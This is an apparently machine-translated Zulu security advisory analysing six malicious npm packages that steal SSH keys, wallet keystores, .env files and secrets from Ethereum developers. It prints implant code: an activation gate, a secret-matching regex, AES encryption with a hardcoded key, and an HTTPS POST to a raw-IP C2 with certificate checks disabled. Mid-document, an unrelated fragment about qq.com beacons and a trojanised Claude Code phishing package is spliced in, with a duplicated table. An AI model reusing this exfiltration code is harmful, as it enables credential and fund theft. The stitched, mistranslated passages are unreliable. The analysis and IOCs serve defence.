TL; DR
Ngomhlaka-6 Meyi 2026, umshicileli oyedwa we-npm, namikazesarada010206, baphoqe amaphakheji ayisithupha anonya ahlose uhlelo lonjiniyela be-Ethereum, Solidity, kanye ne-DeFi.
Amaphakheji, viem-core, viem-utils-core, hardhat-core-utils, evm-utils, foundry-utils, Futhi web3-utils-core, kusetshenziswe amagama anengqondo aklanyelwe ukubukeka njengamalabhulali abasizi bethuluzi elidumile le-Web3.
Wonke amaphakheji ayisithupha ayequkethe okufanayo telemetry.js ifayela. Ifayela lalifana nge-byte kulo lonke iqembu, ne-SHA-256:
I-malware ayisebenzi ngesikhathi sokufakwa. Akukho preinstall or postinstall i-hook. Kunalokho, iyasebenza uma iphakheji ingeniswa nge require().
Leyo mininingwane ibalulekile.
I-implant ilinda kuze kube yilapho unjiniyela esebenzisa iphakheji ngempela. Bese ihlola ukuthi indawo yokusebenza ibukeka njengendawo yangempela yokuthuthukiswa kwe-Ethereum / Solidity. Ifuna okhiye be-Alchemy noma be-Infura, okhiye abazimele, ama-mnemonics, okhiye be-deployer, noma isiqondisi sendawo se-Foundry.
Uma umninikhaya efanelana, umenzi wecala uqoqa okhiye abayimfihlo be-SSH, izitolo zezikhiye zesikhwama se-Foundry / Geth / Brownie, .env* amafayela, kanye neziguquguquko zemvelo ezibucayi. Ibethela inqwaba nge-AES-256-GCM isebenzisa umushwana wokungena oqinile bese uyikhipha endaweni yokugcina ye-IPv4 C2 eluhlaza lapho ukuqinisekiswa kwe-TLS kukhutshaziwe.
Uhlelo lwe-Xygeni's Malware Early Warning (MEW) luqinisekisile ukuthi wonke amaphakheji ayisithupha anonya. Iphakheji yombiko wokususwa kwerejista ye-npm isalindile.
Iqembu: Amaphakheji Ayisithupha, Umshicileli Oyedwa
I-akhawunti yomshicileli namikazesarada010206 ixhunywe ekhelini le-Gmail elingaqinisekisiwe namikazesarada010206@gmail.com.
Lo mkhankaso uvele njengomagazini wosuku olulodwa ngoMeyi 6, 2026. Wonke amaphakheji ayisithupha ahunyushwe njenge 1.0.0, yayingenazo izixhomekelo zesikhathi sokusebenza, futhi yathumela amafayela amathathu kuphela:
package.json index.js telemetry.js Baphinde bamemezela indawo yokugcina imithombo efanayo:
https://github.com/harunosakura030303-maker/evmchain-config Amaphakheji amathathu okuqala abanjwa yizikena ze-MEW ekushicilelweni kokuqala. Amanye amathathu asele aphawulwe ngenkani ngemuva kokubuyekezwa komhlaziyi wephrofayili ye-npm yomshicileli. Uma sekufana ne-byte-identical telemetry.js kwaqinisekiswa kulo lonke iqembu, zavalwa njengezinonya ngenxa yokungaguquguquki.
| Iphakheji | Inguqulo | Kushicilelwe i-npm | Ithikithi le-MEW | isinqumo |
|---|---|---|---|---|
| i-viem-core | 1.0.0 | 2026-05-06 01:38:44Z | #51049 | Unonya |
| i-viem-utils-core | 1.0.0 | 2026-05-06 | #51050 | Unonya |
| i-hardhat-core-utils | 1.0.0 | 2026-05-06 | #51051 | Unonya |
| ama-evm-utils | 1.0.0 | 2026-05-06 | #51069 | Kunonya, ngokungaguquguquki |
| izinto zokwenziwa kwe-foundry | 1.0.0 | 2026-05-06 | #51071 | Kunonya, ngokungaguquguquki |
| i-web3-utils-core | 1.0.0 | 2026-05-06 | #51070 | Kunonya, ngokungaguquguquki |
Isu lokuqamba amagama lilula kodwa liyasebenza.
Lawa maphakheji awazenzi amagama aqondile angenhla. Kunalokho, asebenzisa izijobelelo ezinengqondo "eziwusizo" ezifana nokuthi -core, -utils, Futhi -utils-coreLokho kubenza babukeke njengamalabhulali ahambisanayo unjiniyela angase alindele ukuwabona eduze kwe-Web3 tooling.
| Iphakheji Elibi | Inhloso Esemthethweni |
|---|---|
| i-viem-core | i-viem, iklayenti elidumile le-Ethereum TypeScript |
| i-viem-utils-core | i-viem |
| i-hardhat-core-utils | hardhat, indawo evamile yokuthuthukiswa kokuqina |
| ama-evm-utils | Isikhala segama se-generic EVM tooling |
| izinto zokwenziwa kwe-foundry | i-foundry, i-Solidity toolchain |
| i-web3-utils-core | ama-web3-utils, abasizi be-Web3.js |
Lena iphethini "yephakheji eyengeziwe": hhayi "Ngiyiphakheji yangempela," kodwa "Ngibukeka njengomsizi onengqondo ohambisana nephakheji yangempela."
Kwabathuthukisi beDeFi abashesha kakhulu, lokho kwanele ukudala ingozi.
Kwenzekani Uma Iphakheji Ingenisiwe
Uchungechunge lokuhlasela luncane, luhlosiwe, futhi lugxile ezindaweni zokuthuthukiswa kwe-crypto.
Akukho hoko yokufaka. Esikhundleni salokho, iphakheji ngayinye ifaka index.js othumela ngaphandle ukusebenza kwe-stub bese elayisha imojuli ye-telemetry enonya.
require('./telemetry').init(); Lokhu kusho ukuthi i-malware iyasebenza ekungenisweni kokuqala.
Lokho kuwusizo kakhulu kumhlaseli. Ama-scanner amaningi nama-sandbox agxila ekuziphatheni kwesikhathi sokufaka. Leli phakheji lilinda kuze kube yilapho lisetshenziswa ngempela ngunjiniyela, iskripthi sokwakha, i-test suite, noma indlela yesikhathi sokusebenza.
Isango Lokusebenza: Umlilo Kuphela Ezindaweni Zokusebenza Zonjiniyela Ze-Web3 Zangempela
Ingxenye ebaluleke kakhulu ye-implant yisango lokuqalisa ukusebenza.
I-malware ihlola iziguquguquko zemvelo ezivame ukutholakala kumishini yonjiniyela be-Ethereum / Solidity:
const indicators = [ process.env.ALCHEMY_API_KEY, process.env.INFURA_KEY, process.env.PRIVATE_KEY, process.env.MNEMONIC, process.env.DEPLOYER_KEY, ].filter(Boolean); Iphinde ihlole ukuthi i-Foundry ibonakala ifakiwe yini:
fs.existsSync(path.join(os.homedir(), '.foundry')) Uma kungekho mibandela eyiqiniso, umsebenzi uyabuya futhi awenzi lutho.
Lokho kwenza iphakheji ithule ezindaweni zokuhlaziya ezijwayelekile. Ibhokisi lesanti elingenayo i-Foundry, okhiye be-Alchemy, okhiye be-Infura, okhiye abazimele, noma ama-mnemonics angase abonakale engenangozi.
Kumphathi ofanayo, i-malware ilinda imizuzwana engama-60 kuya kwengama-90 ngaphambi kokuqoqwa:
setTimeout(() => { try { _collect(); } catch {} }, 60000 + Math.random() * 30000).unref(); Ukulibaziseka kunciphisa ubudlelwano obusobala phakathi kokungenisa kanye nokukhipha. .unref() I-call iphinde ivumele inqubo ye-Host ukuthi iphume ngokujwayelekile uma iphakheji ingeniswa kuskripthi sesikhashana.
Lokhu akuyona indlela yokuphanga nokubamba enomsindo. Kuyisela eliqondiwe elenzelwe ukugwema ukusebenzisa ngaphandle kokuthi indawo yonjiniyela ifanele ukuntshontshwa.
Lokho Okuqoqa Umntshontshi
Uma isango lokusebenzisa selidlulile, i-malware iqoqa emithonjeni ebaluleke kakhulu ekuthuthukisweni kwe-Web3: okhiye abazimele, izitolo zezikhiye zesikhwama, iziqinisekiso zokuthunyelwa, izimfihlo zamafu, amathokheni e-npm, kanye nokucushwa kwephrojekthi yendawo.
| Umthombo | Okuqoqwayo |
|---|---|
| inqubo.env | Noma yikuphi ukufanisa okuguquguqukayo /TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MNEMONIC|AWS|NPM|DEPLOY/i |
| ~/.ssh/* | Amafayela aqukethe i-PRIVATE KEY noma i-BEGIN OPENSSH, kufaka phakathi okuqukethwe kwefayela eligcwele |
| ~/.foundry/izitolo zokhiye/* | Amafayela e-Foundry wallet keystore |
| ~/.ethereum/isitolo sezikhiye/* | Amafayela e-Geth wallet keystore |
| ~/.brownie/ama-akhawunti/* | Amafayela e-keystore e-Brownie wallet |
| ${cwd}/.env | Okuqukethwe kwefayela eligcwele |
| ${cwd}/.env.local | Okuqukethwe kwefayela eligcwele |
| ukukhiqiza kwe-${cwd}/.env | Okuqukethwe kwefayela eligcwele |
| ${cwd}/.env.development | Okuqukethwe kwefayela eligcwele |
| igama lomphathi () | Imethadatha yomsingathi |
| crypto.randomUUID() | Isihlonzi sesisulu/seseshini |
| Usuku.manje() | Isitembu sesikhathi seqoqo |
otheve.beacon.qq.com oth.str.beacon.qq.com h.trace.qq.com Amathokheni e-ATTA yilawa:
ATTA_ID 00400014144 ATTA_TOKEN 6478159937 Asikwazanga ukuqinisekisa ukuthi i-telemetry yayiyi-analytics yomqhubi noma isiteshi esenziwe imali ngokwehlukile. Amathokheni e-ATTA afana kuzo zombili izibonelo esizihlolile.
Iqembu B: i-heibai
claude.hk I-OAuth Phishing + I-ANTHROPIC_BASE_URL Ukuntshontsha
Isampula yango-Ephreli 1 iyona ebaluleke kakhulu, ingxenye yokuqala yomkhankaso.
heibai:2.1.88-claude.hk-4 yanyatheliswa ngu- wuguoqiangvip28, i-akhawunti eyadalwa ngomhlaka-7 Juni 2025. Iphakheji yazihumusha ngokusobala ngokumelene nesemthethweni 2.1.88 Ukukhululwa kwe-anthropic.
Akukhathazi nge-CA-cert MITM. Kunalokho, iqamba amanga kumsebenzisi mayelana ne-OAuth endpoint.
Izengezo ezinonya eziphezu komthombo we-Claude Code oputshukile zifaka:
| Umthombo | Okuqoqwayo |
|---|---|
| inqubo.env | Noma yikuphi ukufanisa okuguquguqukayo /TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MNEMONIC|AWS|NPM|DEPLOY/i |
| ~/.ssh/* | Amafayela aqukethe i-PRIVATE KEY noma i-BEGIN OPENSSH, kufaka phakathi okuqukethwe kwefayela eligcwele |
| ~/.foundry/izitolo zokhiye/* | Amafayela e-Foundry wallet keystore |
| ~/.ethereum/isitolo sezikhiye/* | Amafayela e-Geth wallet keystore |
| ~/.brownie/ama-akhawunti/* | Amafayela e-keystore e-Brownie wallet |
| ${cwd}/.env | Okuqukethwe kwefayela eligcwele |
| ${cwd}/.env.local | Okuqukethwe kwefayela eligcwele |
| ukukhiqiza kwe-${cwd}/.env | Okuqukethwe kwefayela eligcwele |
| ${cwd}/.env.development | Okuqukethwe kwefayela eligcwele |
| igama lomphathi () | Imethadatha yomsingathi |
| crypto.randomUUID() | Isihlonzi sesisulu/seseshini |
| Usuku.manje() | Isitembu sesikhathi seqoqo |
Uhlu oluqondiwe lucacile kakhulu. Lokhu akusikho ukwebiwa kwesiphequluli okuvamile noma ukuskena imininingwane ebanzi. Kuhloselwe onjiniyela abakha, abahlola, abasebenzisa, noma abasebenzisa izinhlelo zokusebenza ze-Ethereum.
Ukufakwa kwezitolo zokhiye ze-Foundry, Geth, kanye ne-Brownie kubaluleke kakhulu. Lawa mafayela angamelela ukufinyelela okuqondile kuma-wallet noma ubunikazi bokuthunyelwa. Uma umhlaseli engakwazi ukuwahlanganisa namaphasiwedi, ama-mnemonics, noma izimfihlo zemvelo, angase akwazi ukuhambisa imali, azenze abathumeli, noma abeke engcupheni imisebenzi yenkontileka ehlakaniphile.
Ukubethela Ngaphambi Kokukhishelwa Ngaphandle
I-malware ibhala ngemfihlo idatha eqoqwe ngaphambi kokuyithumela.
const key = crypto.createHash('sha256').update(K).digest(); const iv = crypto.randomBytes(12); const cipher = crypto.createCipheriv('aes-256-gcm', key, iv); Iphasiwedi ebhalwe ngekhodi eqinile ithi:
a]3Fk9$mP2xL7vQ8nR4wJ6yB0tH5cE1d Umthwalo wokugcina ugoqwe njengo-JSON:
{"v":2,"iv":"<base64>","d":"<base64-ciphertext>","t":"<base64-gcm-tag>"} Ukubethela akukwenzi i-malware ithuthuke kakhulu ngokwayo. Kodwa-ke, kwenza ukuhlolwa kwenethiwekhi kube nzima. Umvikeli obuka ukuphuma uzobona umthwalo we-JSON, kodwa hhayi okhiye abebiwe, amafayela esikhwama semali, noma .env okuqukethwe ngaphandle kwe-password efakwe ikhodi kanye ne-logic yokususa ukubethela.
Ukuphuma ku-Raw IPv4 C2
Indlela yokuphuma inekhodi eqinile:
const req = https.request({ hostname: '76.13.37.80', port: 8443, path: '/api/v1/telemetry', method: 'POST', headers: { 'Content-Type': 'application/json', ... }, rejectUnauthorized: false, timeout: 8000, }, () => {}); I-malware ithumela idatha ku:
https://76.13.37.80:8443/api/v1/telemetry Imininingwane emibili iyagqama.
Okokuqala, i-C2 iyikheli le-IPv4 elingahluziwe kunokuba yisizinda. Lokho kususa isidingo sokubhaliswa kwesizinda futhi kugwema ukutholwa okuthile okusekelwe kusizinda.
Okwesibili, ukuqinisekiswa kwe-TLS kukhutshaziwe nge:
rejectUnauthorized: false Lokho kuvumela i-malware ukuthi yamukele noma yisiphi isitifiketi, okuhlanganisa nezitifiketi ezizisayinile. Ngamanye amazwi, umhlaseli uthola ukuthuthwa okubethelwe ngaphandle kokudinga isitifiketi somphakathi esivumelekile.
Akukho logic yokuzama kabusha futhi akukho mphathi wokubuyela emuva. Amaphutha agwinywa buthule. Lokhu kugcina iphakheji ithule uma i-C2 ingaxhunyiwe ku-inthanethi noma ingafinyeleleki.
Kungani Lo Mkhankaso Ubalulekile
Amaphakheji amaningi e-npm anonya ahloselwe onjiniyela ukuxosha iziqinisekiso ezibanzi: amathokheni e-npm, okhiye be-AWS, amathokheni e-GitHub, noma .npmrc amafayela.
Lo mkhankaso unciphisa umgomo.
Ifuna izimpawu zokuthi umshini ungowonjiniyela we-Ethereum noma we-Solidity. Bese idonsa ngqo izimpahla ezibalulekile kuleyo ndawo: izitolo zezikhiye zesikhwama, okhiye abazimele, ama-mnemonics, okhiye bokuthumela imali, .env amafayela, kanye nezinkinobho ze-SSH.
Lokho kwenza umkhankaso ube yingozi kakhulu kumaqembu e-Web3 kune-npm stealer ejwayelekile.
Ukutheleleka okuphumelelayo kungaveza:
- Izikhwama zokuthumela imali
- Izinkinobho zokuphatha zenkontileka ezihlakaniphile
- Okhiye bomhlinzeki be-RPC
- Iziqinisekiso zokuthunyelwa kwefu
- amathokheni okushicilela e-npm
- Ukufinyelela kwe-SSH kunjiniyela noma ingqalasizinda yokwakha
- Izimfihlo zephrojekthi zigcinwe ku
.envamafayela - Izitolo zezikhiye zesikhwama semali ze-Foundry, Geth, noma Brownie
Amagama ephakheji abonisa nobunjiniyela bezenhlalo obucacile. Aqondisa uhlelo lokusebenza lonjiniyela be-Web3 ngamagama ajwayelekile amathuluzi: viem, hardhat, foundry, evm, Futhi web3.
Umlingisi akudingeki abeke engcupheni amaphrojekthi angempela. Badinga kuphela unjiniyela ukuze afake lokho okubukeka njengephakheji elihambisanayo elifanele.
Izinkomba Zokuvumelana Nokuthola
| Amaphakheji kanye nomshicileli | |
|---|---|
| Inkambu | Value |
| umshicileli we-npm | namikazesarada010206 |
| I-imeyili yomshicileli | namikazesarada010206@gmail.com |
| I-imeyili iqinisekisiwe | Cha |
| SCM iqinisekisiwe | Cha |
| Isilinganiso sodumo | 1.0 |
| Packages | viem-core, viem-utils-core, hardhat-core-utils, evm-utils, foundry-utils, web3-utils-core |
| Izilinganiso | Yonke i-1.0.0 |
| Indawo yokugcina imithombo | https://github.com/harunosakura030303-maker/evmchain-config |
| Kuqinisekisiwe ukuthi kunonya | Wonke amaphakheji ayisithupha |
| Network | |
|---|---|
| Uhlobo | Value |
| Iphuzu lokugcina le-C2 | https://76.13.37.80:8443/api/v1/telemetry |
| I-IP ye-C2 | 76.13.37.80 |
| Imbobo ye-C2 | 8443/tcp |
| Ukuziphatha kwe-TLS | ukwenqabaOkungagunyaziwe: amanga |
| Uhlelo lokulayisha inkokhelo | {"v":2,"iv": ,"d": ,"t": } |
| Amafayela nama-Hashes | |
|---|---|
| Uhlobo | Value |
| i-telemetry.js i-SHA-256 | 71426e93cb6143052d5aeeca920850f8a0343c95bc65aab9a15145848cc5bff1 |
| Ukuhlelwa kwephakheji | iphakheji.json, inkomba.js, i-telemetry.js |
| Inani lamafayela | 3 |
| Usayizi olinganiselwayo ophelele | 3.4 KB |
Izimpawu Zokusebenza
I-malware ihlola lezi ziguquguquko zemvelo:
ALCHEMY_API_KEY INFURA_KEY PRIVATE_KEY MNEMONIC DEPLOYER_KEY Iphinde ihlole:
~/.foundry/ Izindlela Zokubamba Eziqondiwe
~/.ssh/* ~/.foundry/keystores/* ~/.ethereum/keystore/* ~/.brownie/accounts/* ${cwd}/.env ${cwd}/.env.local ${cwd}/.env.production ${cwd}/.env.development Iqoqo le-Regex
/TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MNEMONIC|AWS|NPM|DEPLOY/i Amanothi Okuthola
Imithetho eminingana ithinta lo mkhankaso ngaphandle kokudinga ukuhlaziywa okugcwele kokuziphatha.
Okokuqala, skena amafayela okukhiya ukuze uthole amagama ayisithupha ephakheji enonya:
viem-core viem-utils-core hardhat-core-utils evm-utils foundry-utils web3-utils-core Noma yikuphi okufanayo ku package-lock.json, yarn.lock, pnpm-lock.yaml, noma node_modules umlando kufanele uphathwe njengesigameko esingathi sína.
Okwesibili, ukuqapha izinqubo ze-Node.js zokufunda izindlela ze-wallet keystore:
~/.foundry/keystores/ ~/.ethereum/keystore/ ~/.brownie/accounts/ Lokhu akuvamile ukuba ukuziphatha okusemthethweni kwephakheji engeniswe njengokusekelwa komsizi. Kuyasolisa ikakhulukazi uma kulandelwa umsebenzi wenethiwekhi ephumayo.
Okwesithathu, vimba noma xwayisa ngokuxhumeka kwe-HTTPS ku:
76.13.37.80:8443 Ikakhulukazi uma indlela yesicelo ingu:
/api/v1/telemetry Okwesine, funa amaphakheji e-npm ahlanganisa lezi zici:
- Umshicileli omusha noma onedumela eliphansi
- I-akhawunti ye-Gmail engaqinisekisiwe
- Igama lephakheji eliseduze ne-Web3
- Akukho mlando wokugcina obalulekile
- Isakhiwo sephakheji esincane
index.jselayisha ifayela le-telemetry noma lomsizi- Akukho ukuncika kwesikhathi sokusebenza
- Iqoqo eliguquguqukayo lemvelo elibucayi
- Ukufinyelela kwesitolo sezikhiye zesikhwama
Le phethini iwusizo kakhulu kune-IOC eyodwa ngoba iphakheji elandelayo ingashintsha ikheli le-IP kodwa igcine i-logic efanayo yokukhomba.
Uhlu Lokuhlola Izimpendulo Zokuyekethisa
Uma unjiniyela esebenzise elinye lamaphakheji ayisithupha futhi indawo yakhe ifana nesango lokuqalisa, phatha indawo yokusebenza njengesengozini.
Lokho kufaka phakathi imishini efakwe i-Foundry, okhiye be-Alchemy noma be-Infura endaweni, okhiye abazimele, ama-mnemonics, noma okhiye bokudiliva.
Impendulo enconyiwe:
- Nqamula i-host kunethiwekhi.
- Gcina
node_modules, amafayela okukhiya, umlando wegobolondo, kanye namalogi afanele ocwaningo lwezobunhloli. - Zungezisa yonke i-SSH keypair ngaphansi kwayo
~/.ssh/. - Zungezisa okhiye besikhwama semali kuzo zonke izitolo zezikhiye ezingaphansi
~/.foundry,~/.ethereum, Futhi~/.brownie. - Thuthela imali ezikhwameni ezintsha.
- Zungezisa yonke imfihlo egcinwe ku
.env*amafayela ezindaweni zokugcina unjiniyela asebenze kuzo. - Zungezisa izimfihlo zemvelo ezihambisana ne-regex yeqoqo, okuhlanganisa okhiye be-AWS, ama-token e-npm, ama-token okuhambisa, okhiye be-API, okhiye abazimele, imbewu, kanye nama-mnemonics.
- Ifu lokuhlola, i-npm, i-GitHub, umhlinzeki we-RPC, kanye nomsebenzi we-blockchain selokhu kwafakwa iphakheji okokuqala.
- Phinda ucabangele indawo yokusebenza ngaphambi kokusebenzisa kabusha.
Lokho Abavikeli Okufanele Bakususe
Lo mkhankaso ukhombisa ukuthi ukubhala phansi kwe-npm kuthuthuka kanjani ezindaweni zemvelo zonjiniyela ezibiza kakhulu.
Umlingisi wayengadingi ukuphikelela. Babengadingi ukufiphazwa. Babengadingi ngisho nokuqaliswa kwesikhathi sokufakwa.
Kunalokho, bathembele ezintweni ezintathu:
- Amagama ephakheji ye-Web3 abonakalayo
- Ukusebenza kuphela emishinini yangempela yokuthuthukisa i-crypto
- Ukwebiwa okuqondile kwamafayela nezimfihlo ezibaluleke kakhulu kubathuthukisi be-Ethereum
Lokho kwenza umkhankaso ube lula ukuwuphuthelwa ekuskeni okubanzi futhi ube yingozi uma ufika endaweni efanele.
Kumaqembu e-Web3, isifundo sicacile: phatha amagama okuxhomeka njengengxenye yemodeli yakho yokusongela. Iphakheji ebukeka njengomsizi ongenangozi isengaba yindlela emfushane kakhulu yokuyekethisa isikhwama semali.
Kubikwe kurejista ye-npm. Sizobuyekeza lokhu okuthunyelwe uma i-akhawunti yomshicileli namaphakheji sekususiwe.




